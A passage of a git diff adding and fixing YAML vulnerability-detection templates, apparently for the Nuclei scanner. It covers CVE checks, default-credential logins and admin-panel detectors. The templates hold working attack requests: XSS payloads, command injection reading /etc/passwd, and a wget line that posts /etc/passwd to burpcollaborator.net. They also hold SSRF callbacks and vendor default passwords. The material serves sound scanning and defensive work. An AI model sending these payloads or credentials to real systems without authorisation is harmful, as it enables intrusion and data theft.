matchers:
- type: word
words:
- "<img src=x onerror=alert(document.domain)>"
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"

27
cves/2020/CVE-2020-14815.yaml
View File

@ -1,27 +0,0 @@
id: CVE-2020-14815
info:
name: Oracle Business Intelligence XSS
author: pikpikcu
severity: medium
reference: https://www.oracle.com/security-alerts/cpuoct2020.html
tags: cve,cve2020,oracle,xss
source: https://twitter.com/HackerOn2Wheels/status/1326927875279380480
requests:
- method: GET
path:
- "{{BaseURL}}/bi-security-login/login.jsp?msi=false&redirect=%22%3E%3Cimg/src/onerror%3dalert(document.domain)%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "X-Oracle-Dms-Ecid:"
- "X-Oracle-Dms-Rid:"
- "Set-Cookie:"
part: header
condition: and

2
cves/2020/CVE-2020-17530.yaml
View File

@ -5,7 +5,7 @@ info:
author: pikpikcu
severity: critical
reference: http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html
tags: cve,cve2020,apache,rce
tags: cve,cve2020,apache,rce,struts
# Forced OGNL evaluation, when evaluated on raw user input in tag attributes,
# may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.

5
cves/2020/CVE-2020-1943.yaml
View File

@ -3,19 +3,20 @@ id: CVE-2020-1943
info:
name: Apache OFBiz Reflected XSS
author: pd-team
description: Data sent with contentId to /control/stream is not sanitized, allowing XSS attacks in Apache OFBiz 16.11.01 to 16.11.07.
severity: medium
tags: cve,cve2020,apache,xss
requests:
- method: GET
path:
- '{{BaseURL}}/control/stream?contentId=<svg/onload=alert(1)>'
- '{{BaseURL}}/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(xss)%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<svg/onload=alert(1)>"
- "<svg/onload=alert(xss)>"
part: body
- type: word

2
cves/2020/CVE-2020-2036.yaml
View File

@ -3,6 +3,8 @@ info:
name: Palo Alto Networks Reflected XSS
author: madrobot
severity: medium
description: >
A reflected cross-site scripting (XSS) vulnerability exists in the PAN-OS management web interface. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9.
reference: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/
tags: cve,cve2020,vpn,xss

5
cves/2020/CVE-2020-2096.yaml
View File

@ -4,6 +4,11 @@ info:
name: Jenkins Gitlab Hook XSS
author: madrobot
severity: medium
description: Jenkins Gitlab Hook Plugin 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected XSS vulnerability.
reference:
- https://jenkins.io/security/advisory/2020-01-15/#SECURITY-1683
- http://www.openwall.com/lists/oss-security/2020/01/15/1
- http://packetstormsecurity.com/files/155967/Jenkins-Gitlab-Hook-1.4.2-Cross-Site-Scripting.html
tags: cve,cve2020,jenkins,xss
requests:

26
cves/2020/CVE-2020-21224.yaml Normal file
View File

@ -0,0 +1,26 @@
id: CVE-2020-21224
info:
name: Inspur ClusterEngine V4.0 RCE
author: pikpikcu
severity: critical
reference: https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul
tags: cve,cve2020,clusterengine,rce
requests:
- method: POST
path:
- '{{BaseURL}}/login.php'
body: "op=login&username=;`cat /etc/passwd`&password="
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
part: body
- type: status
status:
- 200

4
cves/2020/CVE-2020-2140.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2020-2140
info:
author: j3ssie/geraldino2
name: Jenkin AuditTrailPlugin XSS
name: Jenkin Audit Trail Plugin XSS
severity: medium
description: Jenkins Audit Trail Plugin 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability.
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-2140
reference: https://www.jenkins.io/security/advisory/2020-03-09/
tags: cve,cve2020,jenkins,xss
requests:

6
cves/2020/CVE-2020-25213.yaml
View File

@ -1,11 +1,13 @@
id: CVE-202025213
id: CVE-2020-25213
info:
name: WP File Manager RCE
author: foulenzer
severity: critical
description: The vulnerability allows unauthenticated remote attackers to upload .php files. This templates only detects the plugin, not its vulnerability.
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-25213
reference:
- https://plugins.trac.wordpress.org/changeset/2373068
- https://github.com/w4fz5uck5/wp-file-manager-0day
tags: cve,cve2020,wordpress,rce
# Uploaded file will be accessible at:-

4
cves/2020/CVE-2020-26073.yaml
View File

@ -1,9 +1,9 @@
id: CVE-202026073
id: CVE-2020-26073
info:
name: Cisco SD-WAN vManage Software Directory Traversal
author: madrobot
severity: high
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-202026073
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26073
tags: cve,cve2020,cisco,lfi
requests:

8
cves/2020/CVE-2020-26214.yaml
View File

@ -5,12 +5,12 @@ info:
author: CasperGN
severity: critical
description: Alerta prior to version 8.1.0 is prone to Authentication Bypass when using LDAP as authorization provider and the LDAP server accepts Unauthenticated Bind reqests.
reference: https://github.com/advisories/GHSA-5hmm-x8q8-w5jh
reference:
- https://github.com/advisories/GHSA-5hmm-x8q8-w5jh
- https://tools.ietf.org/html/rfc4513#section-5.1.2
- https://pypi.org/project/alerta-server/8.1.0/
tags: cve,cve2020,alerta
# Reference: https://github.com/advisories/GHSA-5hmm-x8q8-w5jh
# Reference: https://tools.ietf.org/html/rfc4513#section-5.1.2
requests:
- method: GET
path:

27
cves/2020/CVE-2020-26948.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2020-26948
info:
name: Emby Server SSRF
author: dwisiswant0
severity: critical
reference: https://github.com/btnz-k/emby_ssrf
description: Emby Server before 4.5.0 allows SSRF via the Items/RemoteSearch/Image ImageURL parameter.
tags: cve,cve2020,emby,jellyfin,ssrf
requests:
- method: GET
path:
- "{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net"
matchers-condition: and
matchers:
- type: status
status:
- 500
- type: word
words:
- "Name or service not known"
part: body
- type: word
words:
- "text/plain"
part: header

4
cves/2020/CVE-2020-27986.yaml
View File

@ -8,7 +8,7 @@ info:
SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,
SVN, and GitLab credentials via the api/settings/values URI.
NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it."
refrences: https://nvd.nist.gov/vuln/detail/CVE-2020-27986
references: https://nvd.nist.gov/vuln/detail/CVE-2020-27986
tags: cve,cve2020,sonarqube
requests:
@ -25,7 +25,7 @@ requests:
- email.smtp_port.secured
- email.smtp_username.secured
part: body
condtion: and
condition: and
- type: status
status:
- 200

8
cves/2020/CVE-2020-35476.yaml
View File

@ -20,13 +20,15 @@ requests:
- type: status
status:
- 200
- type: regex
regex:
- type: word
words:
- plotted
- timing
- cachehit
part: body
condtion: and
condition: and
- type: word
words:
- application/json

31
cves/2020/CVE-2020-35729.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2020-35729
info:
name: Klog Server Unauthenticated Command Injection
author: dwisiswant0
severity: critical
reference: https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection
description: |
This template exploits an unauthenticated command injection vulnerability
in Klog Server versions 2.4.1 and prior.
The `authenticate.php` file uses the `user` HTTP POST parameter in a call
to the `shell_exec()` PHP function without appropriate input validation,
allowing arbitrary command execution as the apache user.
The sudo configuration permits the apache user to execute any command
as root without providing a password, resulting in privileged command
execution as root.
Originated from Metasploit module, copyright (c) space-r7.
tags: cve,cve2020,klog,rce
requests:
- method: POST
path:
- "{{BaseURL}}/actions/authenticate.php"
body: 'user=pdnuclei%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd=pdnuclei' # Payload: & echo "cHJvamVjdGRpc2NvdmVyeS5pbw==" | base64 -d & echo"
matchers:
- type: word
words:
- "poc-testing" # from Base64 decoding payload

8
cves/2020/CVE-2020–26073.yaml
View File

@ -1,9 +1,13 @@
id: CVE-202026073
id: CVE-2020-26073
info:
name: Cisco SD-WAN vManage Software Directory Traversal
author: madrobot
severity: high
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-202026073
description: |
A vulnerability in the application data endpoints of Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to gain access to sensitive information.
The vulnerability is due to improper validation of directory traversal character sequences within requests to application programmatic interfaces (APIs). An attacker could exploit this vulnerability by sending malicious requests to an API within the affected application. A successful exploit could allow the attacker to conduct directory traversal attacks and gain access to sensitive information including credentials or user tokens.
reference: https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-vman-traversal-hQh24tmk.html
tags: Directory Traversal
requests:

34
cves/2021/CVE-2021-21315.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2021-21315
info:
name: Node.js Systeminformation Command Injection
author: pikpikcu
severity: high
reference: https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
tags: nodejs,cve,cve2021
requests:
- method: GET
path:
- "{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20burpcollaborator.net)"
matchers-condition: and
matchers:
- type: word
words:
- "application/json"
part: header
- type: word
words:
- "wget --post-file /etc/passwd burpcollaborator.net"
- name
- running
- pids
part: body
condition: and
- type: status
status:
- 200

4
cves/2021/CVE-2021-21972.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2021-21972
info:
name: VMware vCenter Unauthorized RCE
name: VMware vCenter Unauthenticated RCE
author: dwisiswant0
severity: critical
reference: https://swarm.ptsecurity.com/unauth-rce-vmware/
@ -21,7 +21,7 @@ requests:
words:
- "VSPHERE-UI-JSESSIONID"
part: header
condtion: and
condition: and
- type: regex
regex:
- "(Install|Config) Final Progress"

44
cves/2021/CVE-2021-21978.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2021-21978
info:
name: VMware View Planner Unauthenticated RCE
author: dwisiswant0
severity: critical
reference: https://twitter.com/osama_hroot/status/1367258907601698816
description: |
This template detects an VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability.
Improper input validation and lack of authorization leading to arbitrary file upload in logupload web application.
An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted
file leading to remote code execution within the logupload container.
tags: cve,cve2021,vmware,rce
requests:
- raw:
- |
POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS
Accept: text/html
Referer: {{BaseURL}}
Connection: close
------WebKitFormBoundarySHHbUsfCoxlX1bpS
Content-Disposition: form-data; name="logfile"; filename=""
Content-Type: text/plain
POC_TEST
------WebKitFormBoundarySHHbUsfCoxlX1bpS
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "File uploaded successfully."
part: body
- type: dsl
dsl:
- "len(body) == 28" # length of "\nFile uploaded successfully."

4
cves/2021/CVE-2021-25646.yaml
View File

@ -42,10 +42,10 @@ requests:
words:
- "application/json"
part: header
condtion: and
condition: and
- type: regex
regex:
- "numRowsRead"
- "numRowsIndexed"
part: body
condtion: and
condition: and

36
cves/2021/CVE-2021-26855.yaml Normal file
View File

@ -0,0 +1,36 @@
id: CVE-2021-26855
info:
name: Exchange Server SSRF Vulnerability
author: madrobot
severity: critical
description: |
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
tags: cve,cve2021,ssrf,rce,exchange
reference: |
- https://proxylogon.com/#timeline
- https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
- https://www.shodan.io/search?query=vuln%3ACVE-2021-26855
- https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09
requests:
- raw:
- |
GET /owa/auth/x.js HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Cookie: X-AnonResource=true; X-AnonResource-Backend=somethingnonexistent/ecp/default.flt?~3; X-BEResource=somethingnonexistent/owa/auth/logon.aspx?~3;
Accept-Language: en
Connection: close
matchers-condition: and
matchers:
- type: status
status:
- 500
- 503
- type: word
words:
- 'X-Calculatedbetarget: somethingnonexistent'
part: header

29
cves/2021/CVE-2021-27132.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2021-27132
info:
name: CRLF Injection - Sercomm VD625
author: geeknik
severity: medium
description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to CRLF Injection via the Content-Disposition header - https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132
tags: cve,cve2021,crlf
requests:
- method: GET
path:
- "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0"
matchers-condition: and
matchers:
- type: status
status:
- 404
part: header
- type: word
words:
- "Content-Disposition: attachment;filename=test.txt"
- "Set-Cookie:CRLFInjection=Test"
- "Location: example.com"
- "X-XSS-Protection:0"
part: header
condition: and

29
cves/2021/CVE-2021-27330.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2021-27330
info:
name: Triconsole 3.75 XSS
author: pikpikcu
severity: medium
reference: https://www.exploit-db.com/exploits/49597
tags: cve,cve2021,triconsole,xss
requests:
- method: GET
path:
- '{{BaseURL}}/calendar_form.php/"><script>alert(document.domain)</script>'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(document.domain)</script>"
part: body
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200

2
cves/2021/CVE-2021-3019.yaml
View File

@ -4,7 +4,7 @@ info:
name: Lanproxy Directory Traversal
author: pikpikcu
severity: medium
refrence: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019
tags: cve,cve2021,lanproxy,traversal
requests:

29
cves/2021/CVE-2021-3129.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2021-3129
info:
name: LARAVEL <= V8.4.2 DEBUG MODE - REMOTE CODE EXECUTION
author: z3bd
severity: critical
description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.
reference: https://www.ambionics.io/blog/laravel-debug-rce
tags: cve,cve2021,laravel,rce
# Note:- This is detection template, use the referenced article for detailed exploit.
requests:
- raw:
- |
POST /_ignition/execute-solution HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: deflate
Accept: application/json
Connection: close
Content-Length: 144
Content-Type: application/json
{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "test", "viewFile": "/etc/passwd"}}
matchers:
- type: word
words:
- "failed to open stream: Permission denied"

52
cves/2021/CVE-2021-3378.yaml Normal file
View File

@ -0,0 +1,52 @@
id: CVE-2021-3378
info:
name: FortiLogger Unauthenticated Arbitrary File Upload
author: dwisiswant0
severity: critical
reference: https://erberkan.github.io/2021/cve-2021-3378/
description: |
This template detects an unauthenticated arbitrary file upload
via insecure POST request. It has been tested on version 4.4.2.2 in
Windows 10 Enterprise.
tags: cve,cve2021,fortilogger,fortigate,fortinet
requests:
- raw:
- |
POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS
Accept: application/json
Referer: {{BaseURL}}
Connection: close
X-Requested-With: XMLHttpRequest
------WebKitFormBoundarySHHbUsfCoxlX1bpS
Content-Disposition: form-data; name="file"; filename="poc.txt"
Content-Type: image/png
POC_TEST
------WebKitFormBoundarySHHbUsfCoxlX1bpS
- |
GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "POC_TEST"
part: body
- type: word
words:
- "text/plain"
- "ASP.NET"
condition: and
part: header

22
default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml Normal file
View File

@ -0,0 +1,22 @@
id: micro-focus-ucmdb-default-credentials
info:
name: Micro Focus UCMDB Default Credentials
author: dwisiswant0
severity: high
tags: ucmdb,dlogin
requests:
- method: POST
path:
- "{{BaseURL}}/ucmdb-ui/cms/loginRequest.do;"
body: "customerID=1&isEncoded=false&userName=diagnostics&password=YWRtaW4=&ldapServerName=UCMDB"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "LWSSO_COOKIE_KEY"
part: header

27
default-logins/alibaba/alibaba-canal-default-password.yaml Normal file
View File

@ -0,0 +1,27 @@
id: alibaba-canal-default-password
info:
name: Alibaba Canal Default Password
author: pdteam
severity: high
tags: alibaba,dlogin
requests:
- method: POST
path:
- "{{BaseURL}}/api/v1/user/login"
headers:
Content-Type: application/json
body: |
{"username":"admin","password":"123456"}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'data":{"token"'
- '"code":20000'
condition: and

2
default-logins/apache/tomcat-manager-default.yaml
View File

@ -44,7 +44,7 @@ requests:
- j5Brn9
- tomcat
attack: clusterbomb # Available options: sniper, pitchfork and clusterbomb
attack: pitchfork # Available options: sniper, pitchfork and clusterbomb
raw:
# Request with simple param and header manipulation with DSL functions

27
default-logins/axis2/axis2-default-password.yaml Normal file
View File

@ -0,0 +1,27 @@
id: axis2-default-password
info:
name: Axis2 Default Password
author: pikpikcu
severity: high
tags: axis,apache,dlogin
requests:
- method: POST
path:
- "{{BaseURL}}/axis2-admin/login"
- "{{BaseURL}}/axis2/axis2-admin/login"
headers:
Content-Type: application/x-www-form-urlencoded
body: "userName=admin&password=axis2&submit=+Login+"
matchers-condition: and
matchers:
- type: word
words:
- "<h1>Welcome to Axis2 Web Admin Module !!</h1>"
- type: status
status:
- 200

27
default-logins/dell/dell-idrac-default-login.yaml Normal file
View File

@ -0,0 +1,27 @@
id: dell-idrac-default-login
info:
name: Dell iDRAC6/7/8 Default login
author: kophjager007
severity: high
tags: dell,idrac,dlogin
requests:
- method: POST
cookie-reuse: true
path:
- "{{BaseURL}}/data/login"
body: "user=root&password=calvin"
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content-Type: application/x-www-form-urlencode
Referer: "{{BaseURL}}/login.html"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- <authResult>0</authResult>

29
default-logins/dell/dell-idrac9-default-login.yaml Normal file
View File

@ -0,0 +1,29 @@
id: dell-idrac9-default-login
info:
name: Dell iDRAC9 Default login
author: kophjager007
severity: high
tags: dell,idrac,dlogin
requests:
- method: POST
cookie-reuse: true
path:
- "{{BaseURL}}/sysmgmt/2015/bmc/session"
body: "user=root&password=calvin"
headers:
Accept: "application/json, text/plain, */*"
user: "root"
password: "calvin"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Referer: "{{BaseURL}}/login.html"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- '"authResult":0'

44
default-logins/dvwa/dvwa-default-login.yaml Normal file
View File

@ -0,0 +1,44 @@
id: dvwa-default-login
info:
name: DVWA Default Login
author: pdteam
severity: critical
requests:
- raw:
- |
GET /login.php HTTP/1.1
Host: {{Hostname}}
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
- |
POST /login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID={{session}}; security=low
Connection: close
username=admin&password=password&Login=Login&user_token={{token}}
extractors:
- type: regex
name: token
group: 1
internal: true
part: body
regex:
- "hidden' name='user_token' value='([0-9a-z]+)'"
- type: kval
name: session
internal: true
part: body
kval:
- PHPSESSID
redirects: true
matchers:
- type: word
words:
- "You have logged in as 'admin'"

28
default-logins/frps/frp-default-credentials.yaml Normal file
View File

@ -0,0 +1,28 @@
id: frp-default-credentials
info:
name: Frp Default credentials
author: pikpikcu
severity: info
tags: frp,dlogin
reference: https://github.com/fatedier/frp/issues/1840
requests:
- method: GET
path:
- "{{BaseURL}}/api/proxy/tcp"
headers:
Authorization: "Basic YWRtaW46YWRtaW4="
matchers-condition: and
matchers:
- type: word
words:
- "proxies"
part: body
condition: and
- type: status
status:
- 200

31
default-logins/nexus/nexus-default-password.yaml Normal file
View File

@ -0,0 +1,31 @@
id: nexus-default-password
info:
name: Nexus Default Password
author: pikpikcu
severity: high
tags: nexus,dlogin
requests:
- raw:
- |
POST /service/rapture/session HTTP/1.1
Host: {{Hostname}}
Content-Length: 43
X-Nexus-UI: true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close
username=YWRtaW4%3D&password=YWRtaW4xMjM%3D
matchers-condition: and
matchers:
- type: status
status:
- 204
- type: word
words:
- "Server: Nexus"
- "NXSESSIONID"
part: header
condition: and

23
exposed-panels/acunetix-panel.yaml Normal file
View File

@ -0,0 +1,23 @@
id: acunetix-panel-detect
info:
name: Acunetix Panel detector
author: joanbono
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/#/login"
headers:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
matchers-condition: and
matchers:
- type: word
words:
- '<title>Acunetix</title>'
- '<acx-root></acx-root>'
part: body
- type: status
status:
- 200

21
exposed-panels/advance-setup.yaml Normal file
View File

@ -0,0 +1,21 @@
id: advance-setup-login
info:
name: Advance Setup Login
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/6819
requests:
- method: GET
path:
- '{{BaseURL}}/cgi-bin/webcm?getpage=../html/login.html'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Advanced Setup - Security - Admin User Name &amp; Password</title>'
- type: status
status:
- 200

21
exposed-panels/blue-iris-login.yaml Normal file
View File

@ -0,0 +1,21 @@
id: blue-iris-login
info:
name: Blue Iris Login
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/6814
requests:
- method: GET
path:
- '{{BaseURL}}/login.htm'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Blue Iris Login</title>'
- type: status
status:
- 200

18
exposed-panels/checkmarx-panel.yaml Normal file
View File

@ -0,0 +1,18 @@
id: checkmarx-panel-detect
info:
name: Checkmarx WebClient detector
author: joanbono
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/cxwebclient/Login.aspx"
headers:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
matchers:
- type: word
words:
- '/CxWebClient/webApp/Scripts/libs/authenticationScripts'
part: body

1
exposed-panels/cisco-asa-panel.yaml
View File

@ -4,6 +4,7 @@ info:
name: Cisco ASA VPN panel detect
author: organiccrap
severity: info
tags: cisco
requests:
- method: GET

22
exposed-panels/cisco-integrated-login.yaml Normal file
View File

@ -0,0 +1,22 @@
id: cisco-integrated-login
info:
name: Cisco Integrated Management Controller Login
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/3859
tags: cisco
requests:
- method: GET
path:
- '{{BaseURL}}/login.html'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Cisco Integrated Management Controller Login</title>'
- type: status
status:
- 200

25
exposed-panels/cisco-sd-wan.yaml Normal file
View File

@ -0,0 +1,25 @@
id: cisco-sd-wan
info:
name: Cisco SD-WAN panel
author: z3bd
severity: info
reference: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-bufovulns-B5NrSHbj
tags: cisco
requests:
- method: GET
path:
- "{{BaseURL}}/login"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "SD-Wan Center"
part: body

22
exposed-panels/cisco-security-details.yaml Normal file
View File

@ -0,0 +1,22 @@
id: cisco-security-details
info:
name: Cisco Meraki cloud & Security Appliance details
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/6708
tags: cisco
requests:
- method: GET
path:
- '{{BaseURL}}/#connection'
matchers-condition: and
matchers:
- type: word
words:
- 'Your client connection'
- type: status
status:
- 200

21
exposed-panels/crush-ftp-login.yaml Normal file
View File

@ -0,0 +1,21 @@
id: crushFTP-login
info:
name: CrushFTP WebInterface
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/6591
requests:
- method: GET
path:
- '{{BaseURL}}/WebInterface/login.html'
matchers-condition: and
matchers:
- type: word
words:
- '<title>CrushFTP WebInterface</title>'
- type: status
status:
- 200

22
exposed-panels/d-link-wireless.yaml Normal file
View File

@ -0,0 +1,22 @@
id: dlink-wireless
info:
name: D-Link Wireless Router Login
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/6784
requests:
- method: GET
path:
- '{{BaseURL}}/status.php'
matchers-condition: and
matchers:
- type: word
words:
- '<title>D-LINK SYSTEMS, INC. | WIRELESS ROUTER | HOME</title>'
- '<title>D-LINK SYSTEMS, INC. | WIRELESS ACCESS POINT | HOME</title>'
- type: status
status:
- 200

18
exposed-panels/hivemanager-login-panel.yaml Normal file
View File

@ -0,0 +1,18 @@
id: hivemanager-login-panel
info:
name: HiveManager Login panel
author: binaryfigments
severity: info
requests:
- method: GET
path:
- '{{BaseURL}}/hm/login.action'
matchers-condition: and
matchers:
- type: word
words:
- "HiveManager Login"
- type: status
status:
- 200

18
exposed-panels/hmc-hybris-panel.yaml Normal file
View File

@ -0,0 +1,18 @@
id: hmc-hybris-panel
info:
name: SAP Hybris Management Console
author: dogasantos
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/hmc/hybris"
- "{{BaseURL}}/hybris/hmc/hybris"
matchers:
- type: word
words:
- "hybris Management Console"
part: body

1
exposed-panels/identityguard-selfservice-entrust.yaml
View File

@ -11,6 +11,7 @@ requests:
- "{{BaseURL}}/IdentityGuardSelfService/"
- "{{BaseURL}}/IdentityGuardSelfService/images/favicon.ico"
req-condition: true
redirects: true
max-redirects: 2
matchers:

21
exposed-panels/jfrog.yaml Normal file
View File

@ -0,0 +1,21 @@
id: jfrog-login
info:
name: JFrog Login
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/6797
requests:
- method: GET
path:
- '{{BaseURL}}/ui/login/'
matchers-condition: and
matchers:
- type: word
words:
- '<title>JFrog</title>'
- type: status
status:
- 200

21
exposed-panels/keenetic-web-login.yaml Normal file
View File

@ -0,0 +1,21 @@
id: keenetic-web-login
info:
name: Keenetic Web Login
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/6817
requests:
- method: GET
path:
- '{{BaseURL}}/login#goto=%2Fdashboard'
matchers-condition: and
matchers:
- type: word
words:
- '<title ng-bind="$root.title">Keenetic Web</title>'
- type: status
status:
- 200

22
exposed-panels/microsoft-exchange-login.yaml Normal file
View File

@ -0,0 +1,22 @@
id: exchange-login
info:
name: Microsoft Exchange login page
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/6739
requests:
- method: GET
path:
- '{{BaseURL}}/owa/auth/logon.aspx'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Exchange Log In</title>'
- '<title>Microsoft Exchange - Outlook Web Access</title>'
- type: status
status:
- 200

26
exposed-panels/nessus-panel.yaml Normal file
View File

@ -0,0 +1,26 @@
id: nessus-panel-detect
info:
name: Nessus Panel detector
author: joanbono
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/server/status"
headers:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
matchers-condition: and
matchers:
- type: word
words:
- '{"code":200,"progress":null,"status":"ready"}'
part: body
- type: word
words:
- 'NessusWWW'
part: header
- type: status
status:
- 200

21
exposed-panels/oki-data.yaml Normal file
View File

@ -0,0 +1,21 @@
id: oki-data-corporation
info:
name: Oki Data Corporation
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/5937
requests:
- method: GET
path:
- '{{BaseURL}}/status.htm'
matchers-condition: and
matchers:
- type: word
words:
- 'Oki Data Corporation'
- type: status
status:
- 200

22
exposed-panels/plesk-onyx.yaml Normal file
View File

@ -0,0 +1,22 @@
id: plesk-onyx-login
info:
name: Plesk Onyx login portal
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/6501
requests:
- method: GET
path:
- '{{BaseURL}}/login_up.php'
matchers-condition: and
matchers:
- type: word
words:
- 'Plesk Onyx'
- 'Plesk Obsidian'
- type: status
status:
- 200

21
exposed-panels/powerlogic-ion.yaml Normal file
View File

@ -0,0 +1,21 @@
id: powerlogic-ion
info:
name: PowerLogic ION Exposed
author: dhiyaneshDK
severity: low
reference: https://www.exploit-db.com/ghdb/6810
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
